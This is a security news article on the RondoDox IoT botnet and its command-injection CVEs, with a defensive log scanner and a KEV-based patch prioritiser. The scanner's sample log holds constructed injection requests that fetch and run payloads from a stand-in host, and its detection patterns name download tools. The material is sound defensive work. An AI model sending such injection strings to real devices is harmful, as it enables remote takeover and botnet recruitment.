
RondoDox: From Pwn2Own Vulnerabilities to Global Exploitation

RondoDox is a fast-evolving botnet exploiting over 50 vulnerabilities across 30 vendors

Written By
Ken Underhill
Oct 14, 2025
eSecurity Planet content and product recommendations are editorially independent. We may make money when you click on links to our partners.

Security researchers from Trend Micro uncovered a rapidly expanding botnet operation known as RondoDox. 

The campaign has exploited more than 50 vulnerabilities across over 30 vendors, leveraging both newly discovered and previously demonstrated flaws from Pwn2Own security contests. 

The widespread use of RondoDox highlights the growing danger of automated network exploitation targeting routers, digital video recorders (DVRs), network video recorders (NVRs), and other internet-connected devices.

Weaponizing known vulnerabilities for botnet expansion

The first traces of RondoDox activity appeared in June 2025, when Trend Micro telemetry detected an attack leveraging CVE-2023-1389, an unauthenticated command injection vulnerability in the web management interface of the TP-Link Archer AX21 Wi-Fi router.

The flaw was first demonstrated at Pwn2Own Toronto in December 2022, responsibly disclosed, and patched by TP-Link in March 2023. RondoDox operators nevertheless weaponized it against internet-facing routers still running unpatched firmware, where the vulnerable interface is reachable from the WAN side.

This illustrates a recurring pattern in threat activity: vulnerabilities revealed in security competitions quickly move from contest demonstrations to active exploitation in the wild.

Even though vendors patch these flaws, the gap between disclosure and mass exploitation keeps narrowing, giving botnet operators a steady stream of reliable attack vectors.

A stealthy botnet built to infect everything

RondoDox surfaced as a stealthy botnet campaign focusing on command-injection vulnerabilities across a wide range of devices, including routers, DVRs, NVRs, CCTV systems, and web servers.

The malware's primary objective is to gain shell access, execute remote commands, and drop multi-architecture payloads, that is, binaries built for each of the CPU architectures commonly found in embedded devices, so that one exploitation chain can infect whatever hardware it lands on.

Initial investigations by FortiGuard Labs linked RondoDox to early attacks against TBK DVR-4104/DVR-4216 video recorders and Four-Faith F3x24/F3x36 routers, exploiting the OS command injection flaws CVE-2024-3721 and CVE-2024-12856 respectively.

The campaign has since expanded significantly, employing a “loader-as-a-service” model that bundles RondoDox with well-known malware families such as Mirai and Morte. This hybridized infrastructure has enabled widespread distribution and made detection more complex.

The exploit shotgun approach

Unlike earlier, narrowly focused botnets, RondoDox uses what researchers call an “exploit shotgun” method—simultaneously firing off multiple exploits to compromise as many targets as possible. 

Its arsenal now includes dozens of CVEs affecting routers, cameras, web servers, and IoT devices from over 30 manufacturers. By casting a wide net, RondoDox maximizes infection rates and persistence across diverse environments.

Among the most heavily targeted vulnerabilities are CVE-2023-1389, CVE-2024-3721, and CVE-2024-12856. CVE-2023-1389, for instance, has been listed in CISA's Known Exploited Vulnerabilities (KEV) catalog since 2023.

A KEV listing underscores the critical nature of these flaws and the need for immediate patching.

RondoDox’s payload delivery follows a multi-stage process: initial exploitation of a device’s management interface, remote command execution, payload download, and system registration within the botnet. 

Once compromised, infected devices are used for data exfiltration, distributed denial-of-service (DDoS) attacks, or as launchpads for lateral movement within enterprise networks.
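The multi-stage flow described above (hit a device's management interface, inject a command, fetch and execute a payload) leaves a recognisable trace in the access logs of the device or of a reverse proxy in front of it. What follows is an added example, not code from Trend Micro's or FortiGuard's reports: the log lines are constructed rather than real RondoDox traffic, and the management-path prefixes and the contents of the exploit requests are assumptions for illustration, not published indicators. The block decodes each request twice (injection strings are often double-encoded to slip past naive filters), flags management-interface requests carrying shell metacharacters or a download-and-execute chain, and then reports sources that fired at several distinct endpoints, which is the "exploit shotgun" pattern rather than a single targeted attempt.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in combined log format, not real RondoDox telemetry: a benign
# request, a benign management-interface request, and two injection attempts from one
# source against two different endpoints, the second one double-URL-encoded.
# All addresses are from RFC 5737 documentation ranges.
SAMPLE_LOG = """\
203.0.113.10 - - [14/Oct/2025:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [14/Oct/2025:10:01:05 +0000] "GET /cgi-bin/status?dev=eth0 HTTP/1.1" 200 88 "-" "curl/8.0"
198.51.100.7 - - [14/Oct/2025:10:01:09 +0000] "GET /cgi-bin/status?dev=eth0%3Bcd%20%2Ftmp%3Bwget%20http%3A%2F%2F198.51.100.7%2Farm7%3Bchmod%20777%20arm7%3B.%2Farm7 HTTP/1.1" 200 88 "-" "Mozilla/5.0"
198.51.100.7 - - [14/Oct/2025:10:01:12 +0000] "GET /goform/set_ntp?server=pool.ntp.org%2526%2526%2520curl%2520http%253A%252F%252F198.51.100.7%252Fx.sh%257Csh HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

# Combined/common log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Path prefixes commonly fronting embedded-device management interfaces (assumed list;
# extend it with the endpoints your own device fleet actually exposes).
MGMT_PATH_RE = re.compile(r"^/(cgi-bin/|goform/|boaform/|apply\.cgi|setup\.cgi)", re.I)
# Shell metacharacters that let a parameter value break out of the intended command.
METACHAR_RE = re.compile(r"(;|&&|\|\||`|\$\(|\|)")
# A download tool followed by an execution step: the "fetch, chmod, run" chain that
# IoT botnets use to drop a payload once they have command execution.
DOWNLOAD_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b", re.I)
EXEC_RE = re.compile(r"(chmod\s+\+?x|chmod\s+[0-7]{3,4}|(?:^|[\s;|&])sh\b|\./\w)", re.I)

INJECTION_REASONS = {"shell metacharacters", "payload download tool", "download-and-execute chain"}


def analyze_request(target):
    """Return (decoded target, list of reasons) for one request target."""
    # Decode twice: injections are often double-encoded to slip past naive filters.
    decoded = unquote_plus(unquote_plus(target))
    reasons = []
    if MGMT_PATH_RE.search(decoded):
        reasons.append("management-interface path")
    if METACHAR_RE.search(decoded):
        reasons.append("shell metacharacters")
    if DOWNLOAD_RE.search(decoded) and EXEC_RE.search(decoded):
        reasons.append("download-and-execute chain")
    elif DOWNLOAD_RE.search(decoded):
        reasons.append("payload download tool")
    return decoded, reasons


def scan_log(text):
    """Flag requests that carry an injection indicator, not plain management traffic."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded, reasons = analyze_request(m["target"])
        if INJECTION_REASONS & set(reasons):
            findings.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "path": decoded.split("?", 1)[0],
                "decoded": decoded,
                "reasons": reasons,
            })
    return findings


def shotgun_sources(findings, min_paths=2):
    """Sources that fired injection payloads at several distinct endpoints: the
    one-source-many-exploits pattern rather than a single targeted attempt."""
    paths_by_ip = {}
    for f in findings:
        paths_by_ip.setdefault(f["ip"], set()).add(f["path"])
    return {ip for ip, paths in paths_by_ip.items() if len(paths) >= min_paths}


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["path"], ", ".join(h["reasons"]))
    print("shotgun sources:", sorted(shotgun_sources(hits)))
```

Running the block prints the two flagged requests and the single shotgun source. In production, feed it the access logs of the reverse proxy or WAF in front of device management interfaces and extend MGMT_PATH_RE to the endpoints your fleet actually exposes; the metacharacter check on its own is noisy, so alert on the download-and-execute chain or on the multi-endpoint pattern rather than on any single indicator.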

The vulnerability lifecycle

The RondoDox campaign reveals a critical weakness in global vulnerability management. Even with responsible disclosure and vendor patching, many organizations delay applying updates—leaving devices exposed for months or even years. 

The rapid reuse of Pwn2Own-discovered vulnerabilities demonstrates how quickly research findings can be weaponized when patch adoption lags behind.

With the growing integration of artificial intelligence into cyber operations, attackers can now automate vulnerability scanning, exploit development, and payload distribution—dramatically accelerating the time from CVE disclosure to real-world exploitation.

Furthermore, the campaign underscores the persistence of n-day exploits—attacks leveraging publicly known flaws rather than zero-days. 

As long as unpatched infrastructure remains online, botnets like RondoDox will continue to expand their reach and evolve their methods.

Strengthening organizational security posture

To combat RondoDox and similar campaigns, organizations must adopt a proactive and layered defense strategy. Key mitigations include:

  • Prioritize patching and visibility: Keep an updated asset inventory and quickly patch all high-risk vulnerabilities, including those in the CISA KEV catalog.
  • Strengthen network and access controls: Segment systems, enforce least privilege, use MFA, and limit internet exposure.
  • Enhance monitoring and response: Continuously detect anomalies, use threat intelligence, and maintain tested backups for rapid recovery.
  • Promote security culture and hygiene: Harden configurations, remove default credentials, and train users to recognize and prevent threats.

Together, these measures create a layered defense that reduces exposure, limits attacker movement, and strengthens organizational resilience against evolving threats.
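The first mitigation, an asset inventory checked against the CISA KEV catalog, is mechanical enough to script. The block below is an added example, not tooling from the article or from CISA. It uses a constructed excerpt in the shape of the KEV JSON feed (the live feed is at the URL in the comment), with placeholder dates rather than the catalog's real values, and a constructed mapping of scanner findings to inventory assets in which CVE-2099-0001 is a placeholder for a finding that is not in KEV. It ranks findings so that KEV-listed CVEs on internet-exposed devices with the earliest due dates come first, and marks which ones are already past their due date.

```python
import json
from datetime import date

# Constructed excerpt in the shape of CISA's KEV JSON feed
# (https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json).
# The CVE IDs are the three named in the article; the dates are placeholders for this
# example, not the catalog's actual values.
KEV_FEED = json.dumps({"vulnerabilities": [
    {"cveID": "CVE-2023-1389", "vendorProject": "TP-Link", "product": "Archer AX21",
     "dateAdded": "2025-01-01", "dueDate": "2025-01-22"},
    {"cveID": "CVE-2024-12856", "vendorProject": "Four-Faith", "product": "F3x24 and F3x36",
     "dateAdded": "2025-01-20", "dueDate": "2025-02-10"},
    {"cveID": "CVE-2024-3721", "vendorProject": "TBK", "product": "DVR-4104 and DVR-4216",
     "dateAdded": "2025-04-28", "dueDate": "2025-05-19"},
]})

# Constructed scanner output joined to the asset inventory: which device carries which
# CVE and whether it is reachable from the internet. CVE-2099-0001 is a placeholder ID
# standing in for a finding that is not in KEV.
SCAN_RESULTS = [
    {"asset": "dvr-lobby-01", "cve": "CVE-2024-3721", "internet_exposed": True},
    {"asset": "edge-router-03", "cve": "CVE-2023-1389", "internet_exposed": True},
    {"asset": "lab-router-07", "cve": "CVE-2023-1389", "internet_exposed": False},
    {"asset": "web-intranet-02", "cve": "CVE-2099-0001", "internet_exposed": False},
]


def load_kev(feed_text):
    """Index the KEV feed by CVE ID."""
    return {v["cveID"]: v for v in json.loads(feed_text)["vulnerabilities"]}


def prioritize(scan_results, kev, today):
    """Order findings: KEV-listed first, internet-exposed first, earliest due date first."""
    rows = []
    for r in scan_results:
        entry = kev.get(r["cve"])
        if entry is None:
            rows.append({**r, "in_kev": False, "due": None, "overdue": False, "product": None})
            continue
        due = date.fromisoformat(entry["dueDate"])
        rows.append({**r, "in_kev": True, "due": due, "overdue": due < today,
                     "product": f'{entry["vendorProject"]} {entry["product"]}'})
    # Non-KEV findings sort last; within KEV, exposed devices and earlier due dates first.
    rows.sort(key=lambda x: (not x["in_kev"], not x["internet_exposed"],
                             x["due"] or date.max, x["asset"]))
    return rows


def prioritize_as_of(today_iso):
    """Convenience wrapper over the constructed inputs for a given ISO date."""
    return prioritize(SCAN_RESULTS, load_kev(KEV_FEED), date.fromisoformat(today_iso))


if __name__ == "__main__":
    for row in prioritize_as_of(date.today().isoformat()):
        flag = "OVERDUE" if row["overdue"] else ("KEV" if row["in_kev"] else "not in KEV")
        print(f'{row["asset"]:16} {row["cve"]:15} exposed={row["internet_exposed"]!s:5} {flag}')
```

In practice the scanner output and the exposure flag come from your vulnerability scanner and asset inventory, and KEV_FEED is replaced by a fresh download of the feed; the sort key is the part worth keeping, because it encodes the policy the bullet list states (known-exploited and internet-facing first) rather than leaving it to whoever reads the report.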

By exploiting over 50 vulnerabilities across multiple vendors, the RondoDox campaign demonstrates the growing speed and scale of modern exploit operations. 

As attackers increasingly automate discovery and weaponization through AI and large-scale infrastructure, the window between vulnerability disclosure and exploitation continues to shrink. 

Defending against threats like RondoDox requires constant vigilance, rapid patching, and a proactive commitment to securing every layer of the network.


Ken Underhill is an award-winning cybersecurity professional, bestselling author, and seasoned IT professional. He holds a graduate degree in cybersecurity and information assurance from Western Governors University and brings years of hands-on experience to the field.

Property of TechnologyAdvice. © 2025 TechnologyAdvice. All Rights Reserved